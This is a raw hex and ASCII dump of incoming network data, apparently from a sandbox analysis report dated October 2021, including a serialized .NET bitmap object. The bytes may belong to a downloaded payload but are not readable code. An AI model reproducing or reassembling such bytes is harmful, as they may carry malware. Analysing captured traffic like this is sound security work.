4f af 68 fc e5 63 30 55 34 28 80 d1 70 67 b3 5c d3 58 c5 a4 9f fb 78 54 7f 75 0f 10 30 8e 45 e6 85 98 47 0a d0 fa be 10 de c6 da d0 1f 8b f9 f8 1e c3 7d 0a cb 4c e5 3e b6 6f 06 38 46 59 b5 97 1d Data Ascii: yzuo7$9k;S)d'dD%q':H(X2bzson_Y>E/^KDqN!UY1EO;^UyPJ`N? d(B?35SoP;dkN);w}xnf)*6Ohc0U4(pg\XxTu0EG}L>o8FY
2021-10-16 14:53:38 UTC	3333	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 cf 91 0a 35 22 d8 34 0b 8f 45 bf 81 ab ef 43 e2 4b e7 73 52 eb 7c 12 b7 2f 1a 19 57 5a ae e3 ab ac b0 0d 80 81 a9 99 80 4d cf 52 b5 72 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b1 04 bd 0a 9f b9 88 be 03 ee 22 b4 95 34 df 45 54 62 36 26 8b 80 1b eb 6a 20 71 55 5f 2e fd 29 56 6c 82 ff 7c 3b 0b 88 e2 51 c2 fa d4 27 6b 99 df 29 9e c6 f4 24 62 60 b7 02 be 64 44 39 a1 df 05 34 6d 83 bd 90 7e ba 34 b2 da 6b a9 57 24 13 f6 80 dd b4 81 4a 9d ae 88 b5 77 0d 6d fd 71 e1 27 fa 6c 6f a3 d4 24 06 aa a3 a2 9b a2 32 50 01 a9 Data Ascii: 5"4ECKsR\|/WZMRrR"4ETb6&j qU_.)Vl\|;Q'k)$b`dD94m~4kW$Jwmq'lo$2P
2021-10-16 14:53:38 UTC	3349	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:38 UTC	3357	IN	Data Raw: 04 2c b2 70 5f f7 34 8d c5 c4 90 be eb fa 30 a6 c1 38 5e 0b 0f 7e 0a 1f 7f 53 4b 52 95 9e ad d9 66 45 90 be ea b9 ce c3 be fd ab b0 9d db 17 a8 91 37 97 13 e2 37 9a 59 69 13 16 16 29 9e 1d dc 04 c5 26 b3 5c 28 b8 24 47 c7 cb 6a 7a 31 62 77 8c 4c e7 ab a8 6d 0e 80 7c 07 ec 6a b4 a1 fa 79 d3 c0 e6 0b 00 72 2a 99 51 6d 52 9d f2 e1 30 32 52 f5 02 58 87 cf 7c 23 3a e0 ca c8 41 57 4e a8 34 ac 58 94 eb 66 fb 18 40 98 79 65 9a f3 d1 1e 96 62 a5 9c e0 3d 67 19 19 74 91 0d 0d a4 98 a2 b3 75 9a 4c 11 98 fa 34 37 0d 97 68 f1 0e 08 1d 9c 99 43 e5 2c ff 0b bd fe 87 1a 8e 10 11 c5 ff a8 6f 0e 3a 11 73 2f aa ed a9 f2 61 a3 72 f6 c5 5a c5 e3 db 27 be 9b 09 fd 1e e2 74 61 53 74 c3 a5 68 8c db ca e8 a6 91 d8 9e 92 1d 97 18 b5 d8 c3 5b 1a a7 4b 7d 8e bf b6 07 21 0e e2 26 55 Data Ascii: ,p_408^~SKRfE77Yi)&\($Gjz1bwLm\|jyr*QmR02RX\|#:AWN4Xf@yeb=gtuL47hC,o:s/arZ'taSth[K}!&U
2021-10-16 14:53:38 UTC	3373	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:38 UTC	3381	IN	Data Raw: cd cd a1 a9 8d 75 d0 f3 ae 6a 51 d5 11 31 6a 27 0d 53 77 6a 54 31 88 5b a4 93 51 e1 5d 0c 70 ea 9d 84 14 07 e3 16 6a 6d 3b cd 54 dd 93 2e e7 5a aa d4 10 24 f3 6a 8d 7e 02 14 08 4a b9 27 01 22 00 e2 12 8a 2a 28 42 8b ad 65 97 86 ca f2 46 ae bb a0 25 86 fd fe dc 89 ba ae 83 40 f4 9a 05 9c 47 a8 1a ce 12 6d a5 3f 84 f6 84 54 3f 2e 05 16 99 03 6f 4b 12 ac 53 38 45 4f fc e0 21 ed e0 73 4a 0a 6e 9c 47 e0 f2 41 3d 06 54 dc 7b f4 5e 90 3e dc 59 27 4b b1 2d 30 35 9a 07 86 61 54 d0 80 53 14 3f 1a a1 02 44 dc 5e 1e 69 e2 50 f4 d9 f9 6a b3 b5 9a 8f b7 03 da c8 8a c2 59 78 ee 18 80 e1 59 59 0c 60 78 d6 50 c9 21 2e c3 a5 5d b7 2e ca 06 0d f3 aa d4 af d8 9d dc 0c b2 84 fb c1 f3 3d 64 dd 30 cc ff ba 83 66 7c 90 dd 04 36 20 fe 2b ac e5 db 78 45 d2 22 9b d7 20 6b 0c 3c 87 Data Ascii: ujQ1j'SwjT1[Q]pjm;T.Z$j~J'"*(BeF%@Gm?T?.oKS8EO!sJnGA=T{^>Y'K-05aTS?D^iPjYxYY`xP!.].=d0f\|6 +xE" k<
2021-10-16 14:53:38 UTC	3397	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:38 UTC	3405	IN	Data Raw: a5 99 2c 1b e2 8c b7 d4 c9 97 c2 45 05 bf a1 c7 45 23 81 8d 43 7b 94 34 bf 70 f7 7c ea 53 07 db d4 90 bb b2 73 2e 14 b2 14 8a 87 07 6e c3 de 1c 3d 75 87 49 9b 35 62 2d 16 70 f8 22 9c 27 e5 35 f5 a6 c0 a6 f4 db 49 94 54 6d 84 ca 31 99 c2 19 05 5f ba a3 d3 c1 1a 6e a5 9c 29 c2 fa e1 2e e6 21 52 e7 e6 7f de 6e 03 aa b3 3a c4 05 ac 65 c7 04 2b d5 39 a0 cd 99 19 9c f7 c4 43 66 a4 ec df 87 20 29 29 70 fb dc a1 b2 3e 05 c8 e1 08 55 82 1d d3 a4 12 65 b2 41 e7 f5 6f 72 da 15 05 b6 e5 eb 81 32 9d 7c 75 47 03 8e 7b d6 23 0f d6 f3 18 f4 52 51 6e fa 74 35 6b d8 85 99 4f 08 ec 57 36 4c 94 4a a6 1f 75 32 54 cd e2 80 96 e3 75 a5 18 de 81 52 c4 15 ce ee 8c 7d 67 62 23 b2 ec dc 06 30 f5 d5 fd dc 68 c1 b5 5a 60 59 6d 99 25 05 02 11 74 d2 a0 ff 4b 9a fb 4c 18 0b 80 ae 00 7b Data Ascii: ,EE#C{4p\|Ss.n=uI5b-p"'5ITm1_n).!Rn:e+9Cf ))p>UeAor2\|uG{#RQnt5kOW6LJu2TuR}gb#0hZ`Ym%tKL{
2021-10-16 14:53:38 UTC	3413	IN	Data Raw: 52 d1 4c d9 b0 18 2c 08 7d d6 d3 b0 13 33 a2 01 97 38 43 75 f5 b2 cd 31 0d 78 dc 7c 57 77 0b aa 29 6b c0 3b 2e d9 40 ad cd f6 98 16 09 fc bf b4 4b 91 8d ec b4 fb f1 d4 18 1e ec 73 eb 5d 04 03 c1 74 f7 93 45 2a 96 9b 49 83 bb ae 06 f3 c3 55 c2 04 71 f8 66 4b 8c 06 c5 0e 8c 72 a8 6d 70 b5 a9 6c 1a 11 7d d7 01 b8 30 b7 ec 58 5c 8b a7 79 81 cc 94 c7 75 38 47 70 63 b6 32 ed 7f a7 f0 f6 f9 08 d2 dc af f7 7c 56 ef 54 ae 92 d2 53 da 6a 63 c9 f4 fc aa f6 4c 29 1f 4c 83 c9 f9 fa 25 be b3 59 b8 01 a7 d3 37 ff b3 37 4f 42 16 de 78 56 3f 7b 16 b4 cb b6 6a 06 3e cc 6b 9e 78 ce 49 b9 97 45 b2 56 b9 cb c7 ec f8 2b 88 8f 17 86 b2 04 84 ca 0a 7e 08 e8 81 4f 7d 07 63 aa db 21 ad 0a b8 c6 b9 b1 aa 44 17 74 28 5d a7 2e 52 6e eb c4 60 13 71 0d 0f 00 00 00 00 fa 52 da 9a 39 1e Data Ascii: RL,}38Cu1x\|Ww)k;.@Ks]tE*IUqfKrmpl}0X\yu8Gpc2\|VTSjcL)L%Y77OBxV?{j>kxIEV+~O}c!Dt(].Rn`qR9
2021-10-16 14:53:38 UTC	3429	IN	Data Raw: 53 c9 69 e8 79 0c 64 3c eb d1 92 20 69 e3 f3 9d 16 b8 86 08 38 2a 4b 46 60 b3 46 e7 44 ca c5 c4 fb 32 b3 d7 bd 40 84 a4 7b 77 eb e5 4b 03 df 51 c0 9e 36 6c e6 cd 0b 34 a5 30 3d f2 42 ab 0a 55 c0 d5 18 c6 5a f6 62 7a f4 6a dc 57 49 56 4f 94 a8 30 7d ec 19 25 00 ec 9c fe 0b ce 80 2b 5a 22 b7 e4 29 42 57 0a bf 3f 4b 40 72 06 6e f3 38 14 91 19 76 30 1f 07 e6 0f 0d 26 30 6c e1 aa cf e7 82 3e c5 11 10 21 e9 8c e9 05 02 d2 ad de 07 e7 7c d5 23 20 bd b6 6a f7 79 55 2a 83 20 d8 59 fb 75 6e c4 d9 7f 63 87 e1 62 96 5f 07 a8 75 c8 10 5d e2 17 17 0e 56 02 74 9d 0b 9c 8b 04 c6 d5 64 de 0d 51 c8 76 10 b7 37 f4 45 52 8e 4a 7b 31 da 78 0e 8a 70 e1 40 a6 f8 88 06 2d 8f 64 19 17 d1 f8 a0 7f 21 ed bd 8e 47 c1 4c 9b 63 a8 84 71 28 23 df b8 c6 10 09 8a a6 bd 0c 11 d5 bd 16 19 Data Ascii: Siyd< i8KF`FD2@{wKQ6l40=BUZbzjWIVO0}%+Z")BW?K@rn8v0&0l>!\|# jyU Yuncb_u]VtdQv7ERJ{1xp@-d!GLcq(#
2021-10-16 14:53:38 UTC	3445	IN	Data Raw: ce 57 b0 84 fb 0c 53 c5 64 87 af 99 3a 47 cd 09 bb 36 49 80 d8 9f 30 85 4d fb 9b 3e 62 0a 10 81 1b 85 fe 56 45 bf e6 f0 d6 b9 fb 5f d0 5d 04 c6 05 a1 40 18 32 eb 38 7f d4 06 44 50 0b db 01 e5 ff 93 b0 bb 41 fc 26 25 57 3c 33 23 18 4c 2c c7 79 09 12 7f 81 e1 4f e4 82 3c 08 7d c3 8c 8a 17 08 e6 3a b2 1e 8e 03 0e f1 61 f7 cf 46 c0 23 e5 3a 0a 56 51 aa fe 19 80 8f 46 b8 9f 1f 3e 5b 8c 49 a2 af de 55 fc 55 a3 07 99 fb 5d 5e fc 0c 5b a3 d8 4f db 0c 63 c4 ac 50 a3 20 ed 06 80 5c 85 41 1b e1 9a 60 69 7e 55 79 27 2d 07 c3 e2 dc c8 bd ba 1a 3d 2e e7 b7 c8 b9 60 5d 84 00 fa 00 c6 c0 85 f5 97 aa f9 d3 be 71 eb 87 31 61 05 0d fe 42 2e 6b b0 44 12 4d f0 36 40 27 8e 4c 3a a9 89 50 72 5c c0 85 68 a7 20 80 c2 d2 68 d3 1a 2e 85 ed 0c 8b ca e0 02 65 76 e3 d1 d4 d8 3d 42 a4 Data Ascii: WSd:G6I0M>bVE_]@28DPA&%W<3#L,yO<}:aF#:VQF>[IUU]^[OcP \A`i~Uy'-=.`]q1aB.kDM6@'L:Pr\h h.ev=B
2021-10-16 14:53:38 UTC	3457	IN	Data Raw: 23 5e d4 6e 5b 25 9c a2 01 88 18 a0 76 3d 03 32 1c 4a d7 79 ac 20 17 6d 55 3a 3b 17 bf 7c 9b d3 6d 41 35 e1 c7 bc 2b c7 31 1c 7e 1e 85 1c 47 03 93 a3 9b 6a cd 99 a4 36 28 dd 8a f3 bf 4e bc eb 57 6e ae 2f 77 b4 f1 81 38 70 b3 2a 3f f1 19 53 a8 fc 26 85 89 0d b0 8d 74 66 de a4 38 26 75 3a f9 53 b2 d8 af 40 35 41 b6 44 ba 81 cb 89 73 e5 aa fd dc b1 9b 22 72 fa c1 eb 3e 79 ce 3e 74 a0 cf e3 03 ef f6 0e e0 8f 99 24 32 e9 f4 dd 94 f1 7c 1f f9 48 a8 1e 50 99 2f f9 d0 d2 bb 41 3b bb 37 59 30 92 c0 0b 12 71 6b f7 19 65 7d 3d 8d 47 37 ae 2b 63 f6 da e4 05 fc 9f d9 f5 b2 bc 87 21 dc dd 42 67 c9 02 83 ed 5c 95 bd b2 0f 30 7d bd ae 57 70 40 08 0a 8f d1 13 45 31 6d ef c0 ea 6b 0a fc 78 96 54 32 e8 64 cd 45 f4 2f eb 0f 34 dd bd d0 41 b9 7b 30 e6 bb 24 eb 7c f2 0b b4 e7 Data Ascii: #^n[%v=2Jy mU:;\|mA5+1~Gj6(NWn/w8p*?S&tf8&u:S@5ADs"r>y>t$2\|HP/A;7Y0qke}=G7+c!Bg\0}Wp@E1mkxT2dE/4A{0$\|
2021-10-16 14:53:38 UTC	3473	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:38 UTC	3489	IN	Data Raw: 4d a6 49 08 17 f5 cf 5a da 26 1f b7 64 21 ee c5 43 fa c5 86 c2 39 4c b6 44 41 3d 4b 55 90 a8 b2 f9 04 de b5 86 cf 65 91 85 b7 fd 88 8e 21 5d d0 96 f1 7b 86 99 0f 7b 31 55 dd 1b 54 be 5a c0 bc 83 cc c3 da 8c 38 ef 37 cb bf 5a 03 39 eb 0a 4c 03 e5 c4 9f f1 db 97 b2 64 08 66 c0 9d 50 c4 f4 23 53 d2 2f 8c 99 d7 4d 40 3a e9 0e 50 0b 41 e7 2b 71 1f 41 62 24 73 8b 71 26 50 4f 60 ac b2 88 1c 53 e3 6c 46 f1 6d f3 cf 71 f8 bd 80 d4 04 14 be 76 47 6a d5 57 ac ca d6 21 26 7f bd d0 a6 69 eb 36 e8 cb 2a d1 5b e6 08 d6 67 58 56 f1 7d 54 d0 3b 82 99 59 26 12 22 93 9a a3 06 cb ba 5f db 19 2a 11 3c ec a6 a1 f4 d7 8b 3a 1f 67 75 bb 5b 1b fa f4 25 66 ec da e1 eb a6 ad 4d c9 26 44 03 e1 77 d6 f5 14 3f 69 fd 42 9b 50 31 c9 7c 40 ee 1f 47 f2 d3 e4 54 91 f2 33 6c 4e bd e3 90 74 Data Ascii: MIZ&d!C9LDA=KUe!]{{1UTZ87Z9LdfP#S/M@:PA+qAb$sq&PO`SlFmqvGjW!&i6[gXV}T;Y&"_<:gu[%fM&Dw?iBP1\|@GT3lNt
2021-10-16 14:53:38 UTC	3505	IN	Data Raw: 43 59 f2 ff df 17 1d aa 43 4d d6 7c a5 7a ea 8c 21 d2 3d 39 59 2d 2b 23 df 6e 89 55 73 74 b8 51 0d aa 5c 49 1a f9 1d 28 50 14 b6 6d c3 44 f2 7b 7f 64 23 b0 9c 92 5d 7a 8b c4 36 60 f8 77 8d ab 4a 56 db c6 b1 88 de 6c db f5 af a2 91 b9 9a 13 e3 95 70 92 0e 9e 84 2b 88 20 8f 02 37 48 47 b3 ad 67 7b 07 a2 7b 51 f0 c6 14 d5 23 6f db 4f fe 02 1b 64 6a 9d fc c2 87 f6 be 68 6a 07 cf e6 ab ec 77 99 fa e3 19 72 69 97 d9 43 a0 d3 68 fe de f0 93 60 ba 1d da 37 f0 f3 c6 b5 1c 1d ab f9 66 d1 3b 8e 33 46 db 8a 2a da ec fd 3a 3e df ec fc 48 8b 5f 6d 11 2b 6c 3b 42 fb f7 e1 67 c5 25 b1 4f 4d a0 b6 21 86 9b d7 b9 05 18 b1 8f 6c 9a c2 eb 9f 80 21 a8 91 b1 0c 91 7f 6d 15 f3 47 0c 0b 20 8c 26 1f 35 15 7c a1 80 40 3f ae 50 a7 d0 8b c8 5d e5 f2 08 88 be c5 0f 52 e2 f0 52 ad 7a Data Ascii: CYCM\|z!=9Y-+#nUstQ\I(PmD{d#]z6`wJVlp+ 7HGg{{Q#oOdjhjwriCh`7f;3F*:>H_m+l;Bg%OM!l!mG &5\|@?P]RRz
2021-10-16 14:53:38 UTC	3521	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:38 UTC	3537	IN	Data Raw: 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 62 30 33 66 35 66 37 66 31 31 64 35 30 61 33 61 05 01 00 00 00 15 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2e 42 69 74 6d 61 70 01 00 00 00 04 44 61 74 61 07 02 02 00 00 00 09 03 00 00 00 0f 03 00 00 00 e6 16 00 00 02 42 4d e6 16 00 00 00 00 00 00 36 00 00 00 28 00 00 00 2c 00 00 00 2c 00 00 00 01 00 18 00 00 00 00 00 00 00 00 00 c4 0e 00 00 c4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ublicKeyToken=b03f5f7f11d50a3aSystem.Drawing.BitmapDataBM6(,,
2021-10-16 14:53:38 UTC	3541	IN	Data Raw: bb 2d 10 69 54 0c a4 71 c8 12 a2 0b 60 af 8a dc 91 46 bb 09 00 41 ea cb 06 5d ed eb 0e 58 bd c0 8a 22 43 de e4 24 66 d5 6d 26 34 9b ee 4e 5e ea 07 27 aa 55 5b ec 0b c9 1f 47 74 52 bd 0d c4 1f cc ac 9b 2c db 4d 4a b6 f3 ee c7 d7 8d e6 82 d0 f5 f4 82 ac ec 5f d1 36 4a 5f 80 75 7d f6 e9 88 e8 9b 8d 65 2c 51 45 43 cd b2 6f 47 1e f7 b9 e9 c4 a6 69 9f 90 1b 2d 09 8e ec dc d9 86 36 d2 88 c2 d0 e8 89 bb ab 1c b5 ea 96 bb 10 19 5a ce 2e 6d 4d 2a b7 0c ac 49 c9 a0 dd a6 fd 32 67 0d af 1a 60 bd 0b d4 0b 99 b3 3c 91 71 40 ec 36 de b4 b0 ee db 81 d3 45 c8 ef 0e b5 69 55 0b b9 d8 9b b4 01 3e 42 9c ed 36 12 e2 df f7 9c 37 99 cc dc e3 c6 fe f4 8d a3 31 7d 36 6c a4 b3 b7 d1 33 4f 39 17 81 8a 92 a1 86 b5 85 a9 ce 32 52 f5 89 0d ee 3d 2d 15 21 5f 23 35 89 a7 ec bc 31 62 aa Data Ascii: -iTq`FA]X"C$fm&4N^'U[GtR,MJ_6J_u}e,QECoGi-6Z.mM*I2g`<q@6EiU>B671}6l3O92R=-!_#51b
2021-10-16 14:53:38 UTC	3545	IN	Data Raw: 1b 2b 74 22 1f 23 85 e0 f3 1b 3f 62 43 84 0c 9b 19 3a 0f a4 4c 3c 49 60 ce f2 48 3b 43 3c 4b ca 3d a0 56 33 9e c4 68 e9 81 4e af 26 3c 89 33 c8 5f d3 62 f4 e8 01 fd 39 bc 2c 0d e1 c4 12 2c 41 1e df d9 ad 78 ef b4 19 57 5f 2a 47 c0 b7 23 f3 cc cf ba 0b b6 72 46 55 be 74 7b 10 3b 5e 96 88 14 d7 03 1a 5c 93 2a e6 62 ef 66 25 3c 24 eb 4d 17 e3 63 7b ca f5 60 65 c3 ea de ab 12 54 15 81 34 13 92 23 dc 0c 80 e7 a7 99 17 12 d0 7c 26 1a 45 5f 1a eb 2f ce ce 6e 34 1e a9 e3 fd 96 5e af c1 44 92 97 6a 31 4c 21 2f 47 f2 33 16 f0 b7 d1 cb 76 dd e1 90 2b 91 75 bb 49 81 6c ca 72 a9 f6 0e 2e aa a8 bd db 40 67 bb 73 ee 82 0e 5b 8c f1 de e2 21 cf 89 59 20 3d 20 24 7e 5d 1f 89 6d 72 ad 51 b6 d4 47 0e 8a 09 ef 3f 75 9f 78 18 c3 50 14 64 dc b9 97 be 8f e1 ae 07 fa 93 4f af 5b Data Ascii: +t"#?bC:L<I`H;C<K=V3hN&<3_b9,,AxW_G#rFUt{;^\bf%<$Mc{`eT4#\|&E_/n4^Dj1L!/G3v+uIlr.@gs[!Y = $~]mrQG?uxPdO[
2021-10-16 14:53:38 UTC	3557	IN	Data Raw: 55 c3 b5 68 a8 dd d1 b8 f7 4a 55 70 81 db 5d 40 e4 75 2a 6f 71 ac bf 99 81 f9 65 da 8d 94 3e 7e 38 3f 1e b2 55 ef 77 19 f4 80 32 a5 e0 49 ff 6a 83 0d 6c cf ec 68 08 25 68 7d 12 35 51 e3 12 40 46 8d 5c 38 08 73 a0 aa c2 c8 99 4b 74 7b b5 d5 64 0e dc 7c 70 05 71 1c ba 4c 1f 67 87 29 43 da 7a 84 f8 cd ae b2 f5 83 95 d4 f0 ec 6e 44 fb a1 14 04 ef dc 06 8b 56 00 c5 a3 05 12 e5 83 b5 4f 81 6d 7a ad a2 50 74 5c 05 fb 9d 67 11 5c 53 31 59 cc 9d 18 8e 77 8e 63 ba 2c b9 71 fd f7 2e fd 3c 57 97 5d f3 1d c4 98 37 97 8d b5 a8 f1 82 54 35 1d 6f fb 1b 9a 8f d7 68 93 ab 5b bf 12 f2 68 01 b1 75 a8 d9 52 0c d7 a2 0e dc 1c 74 19 8e 2b a5 6c 80 10 76 58 84 21 b7 ce c7 62 a6 0a 5d 1e 16 4c 47 c5 03 a7 36 ae 95 4b d0 da b4 c9 8b e7 d0 f1 8c ba d1 7c 90 0f 1a 1c 31 f5 d6 e3 38 Data Ascii: UhJUp]@u*oqe>~8?Uw2Ijlh%h}5Q@F\8sKt{d\|pqLg)CznDVOmzPt\g\S1Ywc,q.<W]7T5oh[huRt+lvX!b]LG6K\|18
2021-10-16 14:53:38 UTC	3573	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:38 UTC	3577	IN	Data Raw: ed 28 0b 4e 47 9b 15 2e d3 86 1d e3 d1 74 f3 50 a2 93 96 d0 43 d7 1a de fc c8 53 d7 f0 bc 14 4c 41 77 a9 74 99 97 fe 18 5c 32 9d dd 2b 7f 2d 18 3a fd 9e 1a e8 d1 a2 38 aa b2 7e 42 51 0f 58 ba fc 14 71 28 86 5a 34 40 17 12 65 3e c6 14 54 07 26 fe 16 43 6b e9 8f 27 6f 74 4d 6b 90 75 cd 44 37 d6 88 71 95 5c c8 72 69 02 29 c2 b6 a4 ef d8 29 82 9c 40 0a 0b a2 86 7a 88 12 c4 77 9f bf b7 c5 10 8d 28 1f 65 82 cc dd 5a 95 71 70 02 a8 51 c8 6c aa a1 1f a0 d4 42 da 06 35 1e 1c cd 11 14 67 0f 6d 01 af 6e 69 a2 94 cc 78 21 97 4d a5 1a ff 67 e9 a5 d0 0a 78 7c 0a f5 ae 87 d3 b0 45 af c2 49 fe 12 9e eb 22 52 de e9 73 dc 75 10 f1 ed ba 71 0d e3 90 7c 26 e4 89 23 1e 67 5d 83 bf 00 bd 50 01 73 96 84 2c dc 01 fa 88 cb 76 b5 4a 83 b8 ee 3e 4c fd 37 5e 5e a5 49 09 27 b2 96 02 Data Ascii: (NG.tPCSLAwt\2+-:8~BQXq(Z4@e>T&Ck'otMkuD7q\ri))@zw(eZqpQlB5gmnix!Mgx\|EI"Rsuq\|&#g]Ps,vJ>L7^^I'
